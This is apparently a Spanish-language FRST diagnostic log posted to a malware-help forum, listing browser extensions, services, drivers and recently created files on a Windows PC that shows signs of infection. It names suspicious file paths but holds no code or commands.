FF DefaultProfile: ds5ojdhh.default-1492367854850
FF ProfilePath: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\24bww9ll.default-release [2020-03-25]
FF Extension: (Free Download Manager extension) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\[email protected] [2017-08-11] [Heredado]
FF ProfilePath: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 [2020-03-26]
FF DownloadDir: C:\Users\MARCO AVILA\Desktop
FF Homepage: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://www.google.com.mx/
FF NewTab: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://espanol.yahoo.com/yhs/web?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__hp_WCYID10315__171019__yaff
FF Notifications: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://crackingportal.com; hxxps://notifications.models.xxx; hxxps://www.interjet.com
FF Extension: (English United States Dictionary) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\@unitedstatesenglishdictionary.xpi [2020-02-02]
FF Extension: (ZenMate Free VPN - Mejor VPN) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\[email protected] [2020-03-11]
FF Extension: (English (US) Language Pack) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\[email protected] [2020-03-12]
FF Extension: (FlashGot) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2017-08-22] [Heredado]
FF Extension: (Bulk Media Downloader) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{72b2e02b-3a71-4895-886c-fd12ebe36ba3}.xpi [2017-12-09]
FF Extension: (ReminderFox) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{ada4b710-8346-4b82-8199-5de2b400a6ae}.xpi [2017-06-26] [Heredado]
FF Extension: (Video DownloadHelper) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2019-07-07]
FF Extension: (HTTP Header Live) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{ed102056-8b4f-43a9-99cd-6d1b25abe87e}.xpi [2019-08-20]
FF SearchPlugin: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\searchplugins\yahoo-lavasoft.xml [2017-10-19]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2020-01-21]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\MARCO AVILA\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\MARCO AVILA\AppData\Roaming\IDM\idmmzcc5 [2020-01-24] [Heredado] [no firmado]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Heredado]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_255.dll [2019-09-23] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_255.dll [2019-09-23] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll [2013-04-03] (Adobe Systems, Inc.) [Archivo no firmado]
FF Plugin-x32: @cambridgesoft.com/Chem3D,version=12.0 -> C:\Program Files (x86)\CambridgeSoft\ChemOffice2010\Chem3D\npChem3DPlugin.dll [2009-05-26] (CambridgeSoft Corporation -> CambridgeSoft Corp.)
FF Plugin-x32: @cambridgesoft.com/ChemDraw,version=12.0 -> C:\Program Files (x86)\CambridgeSoft\ChemOffice2010\ChemDraw\npcdp32.dll [2009-05-26] (CambridgeSoft Corporation -> CambridgeSoft Corp.)
FF Plugin-x32: @ieinspector.com/ha_plugin -> C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\firefox\Components [2018-12-06] ()
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: ZEON/PDF,version=2.0 -> C:\Program Files (x86)\Nuance\PDF Professional 7\bin\nppdf.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)

Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default [2020-03-26]
CHR HomePage: Default -> hxxp://google.com.mx/
CHR StartupUrls: Default -> "hxxp://google.com.mx/"
CHR Extension: (Tampermonkey) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-11-14]
CHR Extension: (SingleFile Core) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\jemlklgaibiijojffihnhieihhagocma [2013-06-24]
CHR Extension: (SingleFile) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpiodijhokgodhhofbcjdecpffjipkle [2013-06-24]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-11-14]
CHR Extension: (Vine Client) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\oojohjpgmcfnholboljmkbcchbipcbci [2015-06-28]
CHR Extension: (Chrome Media Router) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-14]
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1 [2020-03-26]
CHR HomePage: Profile 1 -> hxxps://www.google.com.mx/
CHR StartupUrls: Profile 1 -> "hxxp://google.com.mx/"
CHR Extension: (Google Drive) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-16]
CHR Extension: (YouTube) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-30]
CHR Extension: (Twitter Media Downloader) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cblpjenafgeohmnjknfhpdbdljfkndig [2020-03-15]
CHR Extension: (DownAlbum) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cgjnhhjpfcdhbhlcmmjppicjmgfkppok [2020-03-04]
CHR Extension: (Búsqueda de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-31]
CHR Extension: (Twitter) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jgeocpdicgmkeemopbanhokmhcgcflmi [2019-08-29]
CHR Extension: (SingleFile) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\mpiodijhokgodhhofbcjdecpffjipkle [2020-03-17]
CHR Extension: (IDM Integration Module) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2020-02-05]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-09-30]
CHR Extension: (Gmail) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-03-26]
CHR Extension: (Chrome Media Router) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-03-19]
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile [2020-03-26]
CHR Extension: (Presentaciones de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-06-28]
CHR Extension: (Google Docs) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-28]
CHR Extension: (Google Drive) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-06-28]
CHR Extension: (YouTube) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-06-28]
CHR Extension: (Búsqueda de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-06-28]
CHR Extension: (Hojas de cálculo de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-06-28]
CHR Extension: (Gmail) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-28]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-01-21]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MARCOA~1\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx <no encontrado>
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [fhjnbgadgmmffddcilnbmcieekimilcn] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-01-21]

Marco · 27 Marzo, 2020 01:27

==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
S4 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [387128 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [406584 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 CG6Service; C:\Program Files\CyberGhost 6\CyberGhost.Service.exe [204880 2018-06-11] (CyberGhost SRL -> CyberGhost S.A.)
R2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [4667392 2020-03-26] () [Archivo no firmado]
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [786976 2009-10-02] (Acer Incorporated -> Acer Incorporated)
S4 ExpressVPNService; C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe [438664 2019-08-21] (Express Vpn LLC -> ExpressVPN)
S3 GSService; C:\Windows\SysWOW64\GSService.exe [444640 2014-07-28] (cyan soft ltd -> )
S4 Http_analyzer_v7_netfilter; C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\netFilterService.exe [447384 2017-04-12] (QingHai -> )
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [Archivo no firmado]
R2 IsaMonitor; C:\Program Files (x86)\Asistente Infinitum\IsaMonitor.exe [185856 2008-07-23] (Fine Point Technologies, Inc.) [Archivo no firmado]
R2 KMS-R@1n; C:\Windows\[email protected] [26112 2018-11-10] () [Archivo no firmado]
S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [5977200 2020-03-25] (Malwarebytes Inc -> Malwarebytes)
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [6933272 2020-03-25] (Malwarebytes Inc -> Malwarebytes)
R2 msftesql$CSSQL05; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe [95592 2007-06-22] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$CSSQL05; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29263712 2008-11-24] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57966424 2010-09-17] (Microsoft Corporation -> Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Archivo no firmado]
S2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software) [Archivo no firmado]
R2 ODDPwrSvc; C:\Program Files\Acer\Optical Drive Power Management\ODDPWRSvc.exe [158240 2009-09-04] (Acer Incorporated -> Acer Incorporated)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Archivo no firmado]
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [253952 2009-07-09] (Acer Incorporated) [Archivo no firmado]
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [430424 2010-09-17] (Microsoft Corporation -> Microsoft Corporation)
S2 SZASSIST; C:\Program Files (x86)\Clarus\Samsung SecretZone\SZAssistSVC.exe [90112 2010-07-30] (Clarus, Inc.) [Archivo no firmado]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
R2 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [49152 2006-09-28] (Ulead Systems, Inc.) [Archivo no firmado]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292096 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Windows -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-04-20] (Bluestack Systems, Inc. -> BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-04-19] (Bluestack Systems, Inc. -> Bluestack System Inc. )
R3 debutfilter; C:\Windows\System32\DRIVERS\debutfilterx64.sys [34512 2015-11-15] (NCH Software -> )
S3 DrmRAudio; C:\Windows\System32\drivers\DrmRAudio.sys [36064 2014-07-28] (cyan soft ltd -> Windows (R) Win 7 DDK provider)
S3 expressvpnsplittunnel; C:\Program Files (x86)\ExpressVPN\splittunnel\expressvpnsplittunnel.sys [18800 2019-08-21] (ExprsVPN LLC -> )
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [54736 2017-04-15] (SurfRight B.V. -> )
R3 L1C; C:\Windows\System32\DRIVERS\L1C62x64.sys [58880 2009-07-27] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
S3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [54272 2009-06-19] (Microsoft Windows -> Atheros Communications, Inc.)
S3 mdf15; C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys [12288 2010-03-18] () [Archivo no firmado]
S3 mvd21; C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys [64512 2010-06-14] () [Archivo no firmado]
R1 netfilter_v76; C:\Windows\System32\drivers\netfilter_v76.sys [66000 2015-04-11] (Anqing Inspector Software Ltd. -> Windows (R) Win 7 DDK provider) [Archivo no firmado]
S3 netr28ux; C:\Windows\System32\DRIVERS\netr28ux.sys [867328 2009-06-10] (Microsoft Windows -> Ralink Technology Corp.)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software s.r.o. -> Locktime Software)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 RSUSBSTOR; C:\Windows\System32\Drivers\RtsUStor.sys [216064 2009-06-04] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
R1 SCDEmu; C:\Windows\System32\Drivers\SCDEmu.sys [90544 2009-07-26] (Fenghua Lee -> PowerISO Computing, Inc.)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-07-05] () [Archivo no firmado]
S3 StkTMini; C:\Windows\System32\Drivers\StkTMini.sys [528256 2007-11-15] (Syntek Semiconductor Ltd. -> Syntek)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapexpressvpn; C:\Windows\System32\DRIVERS\tapexpressvpn.sys [36208 2019-08-21] (ExprsVPN LLC -> The OpenVPN Project)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2014-05-16] (AnchorFree Inc -> Anchorfree Inc.)
S3 tapnordvpn; C:\Windows\System32\DRIVERS\tapnordvpn.sys [35592 2018-07-24] (TEFINCOM S.A. -> The OpenVPN Project)
S3 tapse01; C:\Windows\System32\DRIVERS\tapse01.sys [39096 2014-12-02] (SurfEasy Inc -> The OpenVPN Project)
S3 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2020-03-26] (WDKTestCert Admin,131480495282941941 -> ) [Archivo no firmado]
S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2020-03-26] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [Archivo no firmado]
S1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-03-26] (WDKTestCert Admin,131666266076831434 -> ) [Archivo no firmado]
S3 cpuz137; \??\C:\Users\MARCOA~1\AppData\Local\Temp\cpuz137\cpuz137_x64.sys [X] <==== ATENCIÓN
S3 hfFilter; system32\drivers\hfFilter.sys [X]
S3 JakNDisMP; system32\DRIVERS\JakNDis.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) ===================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-03-26 18:49 - 2020-03-26 18:51 - 000053709 _____ C:\Users\MARCO AVILA\Desktop\FRST.txt
2020-03-26 18:23 - 2020-03-26 18:23 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc
2020-03-26 18:21 - 2020-03-26 18:21 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-03-26 18:21 - 2020-03-26 18:21 - 000634432 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-03-26 16:36 - 2020-03-26 16:36 - 000001038 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2020-03-26 16:36 - 2020-03-26 16:36 - 000001038 _____ C:\ProgramData\Desktop\Revo Uninstaller.lnk
2020-03-26 16:36 - 2020-03-26 16:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2020-03-26 16:36 - 2020-03-26 16:36 - 000000000 ____D C:\Program Files\VS Revo Group
2020-03-26 16:34 - 2020-03-26 16:34 - 007432520 _____ (VS Revo Group ) C:\Users\MARCO AVILA\Desktop\revosetup.exe
2020-03-26 14:26 - 2020-03-26 18:50 - 000000000 ____D C:\FRST
2020-03-26 14:22 - 2020-03-26 14:22 - 002279936 _____ (Farbar) C:\Users\MARCO AVILA\Desktop\FRST64.exe
2020-03-26 11:59 - 2020-03-26 12:00 - 000079550 _____ C:\Windows\ntbtlog.txt
2020-03-26 11:50 - 2020-03-26 11:50 - 000003176 _____ C:\Windows\system32\Tasks\{111E94BF-2FBE-4662-8EE2-E722532AD46A}
2020-03-26 11:43 - 2020-03-26 11:43 - 000000000 ____D C:\Windows\system32\Tasks\System
2020-03-26 11:40 - 2020-03-26 18:21 - 000003532 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-03-26 11:40 - 2020-03-26 18:21 - 000003200 _____ C:\Windows\system32\Tasks\csrss
2020-03-26 11:40 - 2020-03-26 11:43 - 000000000 ____D C:\ProgramData\ErrorResponder
2020-03-26 11:40 - 2020-03-26 11:40 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-03-26 11:40 - 2020-03-26 11:40 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
2020-03-26 11:40 - 2020-03-26 11:40 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
2020-03-26 11:40 - 2020-03-26 11:40 - 000000000 ___HD C:\Windows\rss
2020-03-26 11:40 - 2020-03-26 11:40 - 000000000 ____D C:\Program Files (x86)\Orchestrale
2020-03-26 11:39 - 2020-03-26 18:40 - 000000510 _____ C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job
2020-03-26 11:39 - 2020-03-26 11:46 - 000000000 ____D C:\ProgramData\SGZPftQsRObztM
2020-03-26 11:39 - 2020-03-26 11:45 - 000000000 ____D C:\ProgramData\pBjXawQUXRlgujtt
2020-03-26 11:39 - 2020-03-26 11:39 - 002300416 _____ C:\Users\MARCO AVILA\AppData\Roaming\rvfecdxs.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 001927680 _____ (Filipe Lourenço ) C:\Users\MARCO AVILA\AppData\Roaming\ergfeefvg.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 000002948 _____ C:\Windows\system32\Tasks\Adobe Flash sdk Files Update up_2020326
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\rkitjuoutqb
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Oded
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Newf
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Komare
2020-03-26 11:38 - 2020-03-26 11:39 - 002134016 _____ (Akeo Consulting) C:\Users\MARCO AVILA\AppData\Roaming\rgfwedwsax.exe
2020-03-26 11:38 - 2020-03-26 11:38 - 000000000 ____D C:\Program Files (x86)\kiss
2020-03-26 11:35 - 2020-03-26 11:35 - 000000000 ____D C:\Program Files (x86)\MaRS
2020-03-26 11:33 - 2020-03-26 11:34 - 000015602 _____ C:\Windows\SysWOW64\findit.xml
2020-03-26 11:33 - 2020-03-26 11:34 - 000000000 ____D C:\ProgramData\Logic Cramble
2020-03-26 11:33 - 2020-03-26 11:33 - 008509952 _____ C:\Users\MARCO AVILA\AppData\Local\agent.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 002160819 _____ C:\Users\MARCO AVILA\AppData\Local\Plustech.tst
2020-03-26 11:33 - 2020-03-26 11:33 - 001895382 _____ C:\Users\MARCO AVILA\AppData\Local\Suntech.bin
2020-03-26 11:33 - 2020-03-26 11:33 - 000126464 _____ C:\Users\MARCO AVILA\AppData\Local\noah.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000069888 _____ C:\Users\MARCO AVILA\AppData\Local\Config.xml
2020-03-26 11:33 - 2020-03-26 11:33 - 000018432 _____ C:\Users\MARCO AVILA\AppData\Local\Main.dat
2020-03-26 11:33 - 2020-03-26 11:29 - 004667392 _____ C:\Users\MARCO AVILA\AppData\Local\Plustech.exe
2020-03-26 11:32 - 2020-03-26 11:33 - 000005568 _____ C:\Users\MARCO AVILA\AppData\Local\md.xml
2020-03-26 11:32 - 2020-03-26 11:32 - 000126464 _____ C:\Users\MARCO AVILA\AppData\Local\lobby.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000068474 _____ C:\Users\MARCO AVILA\AppData\Local\Techsing.tst
2020-03-26 11:32 - 2020-03-26 11:32 - 000045056 _____ C:\Users\MARCO AVILA\AppData\Local\ApplicationHosting.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000000000 ____D C:\ProgramData\CloudPrinter
2020-03-26 11:32 - 2020-03-26 11:29 - 004667392 _____ C:\Users\MARCO AVILA\AppData\Local\Techsing.exe
2020-03-26 11:31 - 2020-03-26 11:32 - 000016368 _____ C:\Users\MARCO AVILA\AppData\Local\InstallationConfiguration.xml
2020-03-26 11:31 - 2020-03-26 11:31 - 000142336 _____ C:\Users\MARCO AVILA\AppData\Local\installer.dat
2020-03-26 11:28 - 2020-03-26 11:48 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\inetinfoservice
2020-03-25 18:28 - 2020-03-26 11:27 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\TimerUtc
